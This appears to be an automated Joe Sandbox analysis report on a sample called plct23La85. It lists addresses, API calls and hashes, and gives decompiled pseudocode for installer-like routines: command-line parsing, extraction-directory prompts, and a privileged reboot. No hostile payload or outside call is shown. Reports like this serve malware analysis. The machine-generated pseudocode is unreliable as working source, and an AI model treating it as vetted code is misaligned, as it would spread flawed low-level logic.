                                                                                                                                                                                                    0x00135d3f
                                                                                                                                                                                                    0x00135d3f
                                                                                                                                                                                                    0x00135d4b
                                                                                                                                                                                                    0x00135d4b
                                                                                                                                                                                                    0x00135d4f
                                                                                                                                                                                                    0x00135d8d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135d93
                                                                                                                                                                                                    0x00135d93
                                                                                                                                                                                                    0x00135d9a
                                                                                                                                                                                                    0x00135d9d
                                                                                                                                                                                                    0x00135d9e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135d9e
                                                                                                                                                                                                    0x00135d51
                                                                                                                                                                                                    0x00135d5b
                                                                                                                                                                                                    0x00135d72
                                                                                                                                                                                                    0x001360fb
                                                                                                                                                                                                    0x001360fb
                                                                                                                                                                                                    0x00136207
                                                                                                                                                                                                    0x0013620a
                                                                                                                                                                                                    0x0013620b
                                                                                                                                                                                                    0x0013620e
                                                                                                                                                                                                    0x00136217
                                                                                                                                                                                                    0x00135d78
                                                                                                                                                                                                    0x00135d78
                                                                                                                                                                                                    0x00135d80
                                                                                                                                                                                                    0x00135d83
                                                                                                                                                                                                    0x00135d84
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135d84
                                                                                                                                                                                                    0x00135d5d
                                                                                                                                                                                                    0x00135d5f
                                                                                                                                                                                                    0x00135d62
                                                                                                                                                                                                    0x00135d68
                                                                                                                                                                                                    0x00135d64
                                                                                                                                                                                                    0x00135d64
                                                                                                                                                                                                    0x00135d64
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135d62
                                                                                                                                                                                                    0x00135d5b
                                                                                                                                                                                                    0x00135d4f
                                                                                                                                                                                                    0x00135d1d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135d9f
                                                                                                                                                                                                    0x00135d9f
                                                                                                                                                                                                    0x00135da5
                                                                                                                                                                                                    0x00135dab
                                                                                                                                                                                                    0x00135dba
                                                                                                                                                                                                    0x00136218
                                                                                                                                                                                                    0x0013621d
                                                                                                                                                                                                    0x00136220
                                                                                                                                                                                                    0x00136221
                                                                                                                                                                                                    0x00136229
                                                                                                                                                                                                    0x00136230
                                                                                                                                                                                                    0x00136247
                                                                                                                                                                                                    0x0013626a
                                                                                                                                                                                                    0x00136272
                                                                                                                                                                                                    0x00136249
                                                                                                                                                                                                    0x00136255
                                                                                                                                                                                                    0x0013625f
                                                                                                                                                                                                    0x00136264
                                                                                                                                                                                                    0x00136264
                                                                                                                                                                                                    0x00136284
                                                                                                                                                                                                    0x00135dc0
                                                                                                                                                                                                    0x00135dc0
                                                                                                                                                                                                    0x00135dca
                                                                                                                                                                                                    0x00135e22
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135dcc
                                                                                                                                                                                                    0x00135dce
                                                                                                                                                                                                    0x00135e24
                                                                                                                                                                                                    0x00135e24
                                                                                                                                                                                                    0x00135e2c
                                                                                                                                                                                                    0x00135e47
                                                                                                                                                                                                    0x00135e4a
                                                                                                                                                                                                    0x001361d2
                                                                                                                                                                                                    0x001361e2
                                                                                                                                                                                                    0x001361e7
                                                                                                                                                                                                    0x001361ee
                                                                                                                                                                                                    0x001361f1
                                                                                                                                                                                                    0x001361f1
                                                                                                                                                                                                    0x001361f8
                                                                                                                                                                                                    0x001361f8
                                                                                                                                                                                                    0x00135e50
                                                                                                                                                                                                    0x00135e53
                                                                                                                                                                                                    0x00136109
                                                                                                                                                                                                    0x0013611f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00136125
                                                                                                                                                                                                    0x00136137
                                                                                                                                                                                                    0x0013613a
                                                                                                                                                                                                    0x0013613c
                                                                                                                                                                                                    0x0013613e
                                                                                                                                                                                                    0x0013613e
                                                                                                                                                                                                    0x00136141
                                                                                                                                                                                                    0x00136141
                                                                                                                                                                                                    0x00136143
                                                                                                                                                                                                    0x00136144
                                                                                                                                                                                                    0x0013614a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00136150
                                                                                                                                                                                                    0x00136152
                                                                                                                                                                                                    0x0013615c
                                                                                                                                                                                                    0x00136170
                                                                                                                                                                                                    0x00136172
                                                                                                                                                                                                    0x0013617c
                                                                                                                                                                                                    0x00136190
                                                                                                                                                                                                    0x00136190
                                                                                                                                                                                                    0x00136196
                                                                                                                                                                                                    0x001361a5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001361ab
                                                                                                                                                                                                    0x00135f46
                                                                                                                                                                                                    0x00135f09
                                                                                                                                                                                                    0x00135f09
                                                                                                                                                                                                    0x00135f09
                                                                                                                                                                                                    0x00135f07
                                                                                                                                                                                                    0x00135f02
                                                                                                                                                                                                    0x00135efc
                                                                                                                                                                                                    0x00135ef7
                                                                                                                                                                                                    0x00135ef2
                                                                                                                                                                                                    0x00135f4c
                                                                                                                                                                                                    0x00135f4e
                                                                                                                                                                                                    0x00135f50
                                                                                                                                                                                                    0x00135f54
                                                                                                                                                                                                    0x00135ed4
                                                                                                                                                                                                    0x00135ea2
                                                                                                                                                                                                    0x00135ea4
                                                                                                                                                                                                    0x00135eaf
                                                                                                                                                                                                    0x00135eaf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135e79
                                                                                                                                                                                                    0x00135e7d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135e83
                                                                                                                                                                                                    0x00135e83
                                                                                                                                                                                                    0x00135e83
                                                                                                                                                                                                    0x00135e85
                                                                                                                                                                                                    0x00135e85
                                                                                                                                                                                                    0x00135e8e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135e94
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135e94
                                                                                                                                                                                                    0x00135e8e
                                                                                                                                                                                                    0x00135e7d
                                                                                                                                                                                                    0x00135e77
                                                                                                                                                                                                    0x00135e6e
                                                                                                                                                                                                    0x00135e65
                                                                                                                                                                                                    0x00135e5c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135dd0
                                                                                                                                                                                                    0x00135dd0
                                                                                                                                                                                                    0x00135dd0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135dd0
                                                                                                                                                                                                    0x00135dce
                                                                                                                                                                                                    0x00135dca
                                                                                                                                                                                                    0x00135dba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00135d00
                                                                                                                                                                                                    0x00135dd9
                                                                                                                                                                                                    0x00135e04
                                                                                                                                                                                                    0x001361fe
                                                                                                                                                                                                    0x00135e0a
                                                                                                                                                                                                    0x00135e0c
                                                                                                                                                                                                    0x00135e17
                                                                                                                                                                                                    0x00135e17
                                                                                                                                                                                                    0x00135e04
                                                                                                                                                                                                    0x00136200
                                                                                                                                                                                                    0x00136200
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CharNextA.USER32(?,00000000,?,?), ref: 00135CEE
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00138B3E,00000104,00000000,?,?), ref: 00135DFC
                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 00135E3E
                                                                                                                                                                                                    • CharUpperA.USER32(-00000052), ref: 00135EE1
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00135F6F
                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 00135FA7
                                                                                                                                                                                                    • CharUpperA.USER32(-0000004E), ref: 00136008
                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 001360AA
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00131140,00000000,00000040,00000000), ref: 001361F1
                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 001361F8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                    • String ID: "$"$:$RegServer
                                                                                                                                                                                                    • API String ID: 1203814774-25366791
                                                                                                                                                                                                    • Opcode ID: 7c93c247ccd907871921f3fd71e5a2353c86f8c7e55057d53dfb061fceaf3e22
                                                                                                                                                                                                    • Instruction ID: d733ba133846f485a4f140595dd7ca6d6463c881cf6e6dac8deadefe806cacc1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c93c247ccd907871921f3fd71e5a2353c86f8c7e55057d53dfb061fceaf3e22
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CD17D71A04A546EDF398B388C483FA7FA7AB16B04F1441B9D4DAD7591DBB08EC68F40
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 60%
                                                                                                                                                                                                    			E00131F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                    				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                    				int _t28;
                                                                                                                                                                                                    				signed char _t30;
                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t41 = __esi;
                                                                                                                                                                                                    				_t38 = __edi;
                                                                                                                                                                                                    				_t30 = __ecx;
                                                                                                                                                                                                    				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                    						if( *0x139a40 != 0) {
                                                                                                                                                                                                    							_pop(_t30);
                                                                                                                                                                                                    							_t44 = _t46;
                                                                                                                                                                                                    							_t13 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                    							_push(_t38);
                                                                                                                                                                                                    							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                    								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                    								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                    								_v12 = 2;
                                                                                                                                                                                                    								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                    								CloseHandle(_v28);
                                                                                                                                                                                                    								_t41 = _t41;
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								if(_t21 != 0) {
                                                                                                                                                                                                    									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                    										_t25 = 1;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t37 = 0x4f7;
                                                                                                                                                                                                    										goto L3;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t37 = 0x4f6;
                                                                                                                                                                                                    									goto L4;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t37 = 0x4f5;
                                                                                                                                                                                                    								L3:
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								L4:
                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								E001344B9(0, _t37);
                                                                                                                                                                                                    								_t25 = 0;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_pop(_t40);
                                                                                                                                                                                                    							return E00136CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t37 = 0x522;
                                                                                                                                                                                                    						_t28 = E001344B9(0, 0x522, 0x131140, 0, 0x40, 4);
                                                                                                                                                                                                    						if(_t28 != 6) {
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					__eax = E00131EA7(__ecx);
                                                                                                                                                                                                    					if(__eax != 2) {
                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                    						return _t28;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00131EFB
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00131F02
                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00131FD3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                    • API String ID: 2795981589-3733053543
                                                                                                                                                                                                    • Opcode ID: 0ac44462c13ceea7cc4af82f70d5b615140a47895a08565eb45639e89772beca
                                                                                                                                                                                                    • Instruction ID: 44691098cabba5d54b14edac6f9ad24618f810c9cf0e55199b95733300c251f8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ac44462c13ceea7cc4af82f70d5b615140a47895a08565eb45639e89772beca
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5521F8B1B402057BEB309BA19C4AFBF7BBCEF85B10F60002DFA06E65C1D77588459661
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00136CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                    
                                                                                                                                                                                                    				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                    				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                    			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00136E26,00131000), ref: 00136CF7
                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(00136E26,?,00136E26,00131000), ref: 00136D00
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,00136E26,00131000), ref: 00136D0B
                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00136E26,00131000), ref: 00136D12
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3231755760-0
                                                                                                                                                                                                    • Opcode ID: c144a40342c614280aa7dce5698d3a651433a39191134c1d87f26151c8ca823a
                                                                                                                                                                                                    • Instruction ID: 5119a92e7b26f3d2017ca56781170666e093268d8a5c28f21a9430dd35eab7da
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c144a40342c614280aa7dce5698d3a651433a39191134c1d87f26151c8ca823a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2D0C932000208BBDB002BE1EC0CA593F28EF48212F844004F35982820CA7244918B52
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                                                                    			E00133210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                    				int _t20;
                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                    				int _t23;
                                                                                                                                                                                                    				char _t24;
                                                                                                                                                                                                    				long _t25;
                                                                                                                                                                                                    				int _t27;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                    				int _t33;
                                                                                                                                                                                                    				int _t34;
                                                                                                                                                                                                    				int _t37;
                                                                                                                                                                                                    				int _t38;
                                                                                                                                                                                                    				int _t39;
                                                                                                                                                                                                    				void* _t42;
                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                    				CHAR* _t49;
                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                    				struct HWND__* _t64;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t64 = _a4;
                                                                                                                                                                                                    				_t6 = _a8 - 0x10;
                                                                                                                                                                                                    				if(_t6 == 0) {
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					L38:
                                                                                                                                                                                                    					EndDialog(_t64, ??);
                                                                                                                                                                                                    					L39:
                                                                                                                                                                                                    					__eflags = 1;
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t42 = 1;
                                                                                                                                                                                                    				_t10 = _t6 - 0x100;
                                                                                                                                                                                                    				if(_t10 == 0) {
                                                                                                                                                                                                    					E001343D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                    					SetWindowTextA(_t64, "nst0dum");
                                                                                                                                                                                                    					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                    					__eflags =  *0x139a40 - _t42; // 0x3
                                                                                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                                                                                    						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L36:
                                                                                                                                                                                                    					return _t42;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t10 == _t42) {
                                                                                                                                                                                                    					_t20 = _a12 - 1;
                                                                                                                                                                                                    					__eflags = _t20;
                                                                                                                                                                                                    					if(_t20 == 0) {
                                                                                                                                                                                                    						_t21 = GetDlgItemTextA(_t64, 0x835, 0x1391e4, 0x104);
                                                                                                                                                                                                    						__eflags = _t21;
                                                                                                                                                                                                    						if(_t21 == 0) {
                                                                                                                                                                                                    							L32:
                                                                                                                                                                                                    							_t58 = 0x4bf;
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0x10);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							L25:
                                                                                                                                                                                                    							E001344B9(_t64, _t58);
                                                                                                                                                                                                    							goto L39;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t49 = 0x1391e4;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t23 =  *_t49;
                                                                                                                                                                                                    							_t49 =  &(_t49[1]);
                                                                                                                                                                                                    							__eflags = _t23;
                                                                                                                                                                                                    						} while (_t23 != 0);
                                                                                                                                                                                                    						__eflags = _t49 - 0x1391e5 - 3;
                                                                                                                                                                                                    						if(_t49 - 0x1391e5 < 3) {
                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t24 =  *0x1391e5; // 0x3a
                                                                                                                                                                                                    						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                    						if(_t24 == 0x3a) {
                                                                                                                                                                                                    							L21:
                                                                                                                                                                                                    							_t25 = GetFileAttributesA(0x1391e4);
                                                                                                                                                                                                    							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                    							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                    								L26:
                                                                                                                                                                                                    								E0013658A(0x1391e4, 0x104, 0x131140);
                                                                                                                                                                                                    								_t27 = E001358C8(0x1391e4);
                                                                                                                                                                                                    								__eflags = _t27;
                                                                                                                                                                                                    								if(_t27 != 0) {
                                                                                                                                                                                                    									__eflags =  *0x1391e4 - 0x5c;
                                                                                                                                                                                                    									if( *0x1391e4 != 0x5c) {
                                                                                                                                                                                                    										L30:
                                                                                                                                                                                                    										_t30 = E0013597D(0x1391e4, 1, _t64, 1);
                                                                                                                                                                                                    										__eflags = _t30;
                                                                                                                                                                                                    										if(_t30 == 0) {
                                                                                                                                                                                                    											L35:
                                                                                                                                                                                                    											_t42 = 1;
                                                                                                                                                                                                    											__eflags = 1;
                                                                                                                                                                                                    											goto L36;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										L31:
                                                                                                                                                                                                    										_t42 = 1;
                                                                                                                                                                                                    										EndDialog(_t64, 1);
                                                                                                                                                                                                    										goto L36;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags =  *0x1391e5 - 0x5c;
                                                                                                                                                                                                    									if( *0x1391e5 == 0x5c) {
                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L30;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_t58 = 0x4be;
                                                                                                                                                                                                    								goto L25;
							}
							_t32 = E001344B9(_t64, 0x54a, 0x1391e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x1391e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x1391e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x1391e4 - 0x5c;
						if( *0x1391e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x139124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x139a3c, 0x3e8, 0x138598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00134224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x1387a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E001344B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}
0x0013321b
0x0013321e
0x00133221
0x0013343c
0x0013343e
0x0013343f
0x00133445
0x00133447
0x00000000
0x00133447
0x00133229
0x0013322a
0x0013322f
0x001333ec
0x001333f7
0x00133410
0x00133416
0x0013341d
0x0013342d
0x0013342d
0x00133438
0x00000000
0x00133438
0x00133237
0x00133243
0x00133243
0x00133246
0x001332ee
0x001332f4
0x001332f6
0x001333d4
0x001333d6
0x001333db
0x001333dc
0x001333de
0x001333df
0x00133370
0x00133372
0x00000000
0x00133372
0x001332fc
0x00133301
0x00133301
0x00133303
0x00133304
0x00133304
0x0013330a
0x0013330d
0x00000000
0x00000000
0x00133313
0x00133318
0x0013331a
0x00133331
0x00133332
0x0013333a
0x0013333d
0x0013337c
0x00133388
0x0013338f
0x00133394
0x00133396
0x001333a4
0x001333ab
0x001333b6
0x001333be
0x001333c3
0x001333c5
0x00133435
0x00133437
0x00133437
0x00000000
0x00133437
0x001333c7
0x001333c9
0x001333cc
0x00000000
0x001333cc
0x001333ad
0x001333b4
0x00000000
0x00000000
0x00000000
0x001333b4
0x00133398
0x00133399
0x0013339b
0x0013339c
0x0013339d
0x00000000
0x0013339d
0x0013334c
0x00133351
0x00133354
0x00000000
0x00000000
0x0013335c
0x00133362
0x00133364
0x00000000
0x00000000
0x00133366
0x00133367
0x00133369
0x0013336a
0x0013336b
0x00000000
0x0013336b
0x0013331c
                                                                                                                                                                                                    0x00133323
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133329
                                                                                                                                                                                                    0x0013332b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013332b
                                                                                                                                                                                                    0x0013324c
                                                                                                                                                                                                    0x0013324c
                                                                                                                                                                                                    0x0013324f
                                                                                                                                                                                                    0x001332c8
                                                                                                                                                                                                    0x001332ce
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001332ce
                                                                                                                                                                                                    0x00133251
                                                                                                                                                                                                    0x00133256
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133271
                                                                                                                                                                                                    0x00133277
                                                                                                                                                                                                    0x00133279
                                                                                                                                                                                                    0x00133298
                                                                                                                                                                                                    0x0013329d
                                                                                                                                                                                                    0x0013329f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001332b0
                                                                                                                                                                                                    0x001332b6
                                                                                                                                                                                                    0x001332b8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001332be
                                                                                                                                                                                                    0x00133280
                                                                                                                                                                                                    0x00133289
                                                                                                                                                                                                    0x0013328e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013328e
                                                                                                                                                                                                    0x0013327b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013327b
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(000003E8,00138598,00000200), ref: 00133271
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 001333E2
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,nst0dum), ref: 001333F7
                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00133410
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000836), ref: 00133426
                                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 0013342D
                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 0013343F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
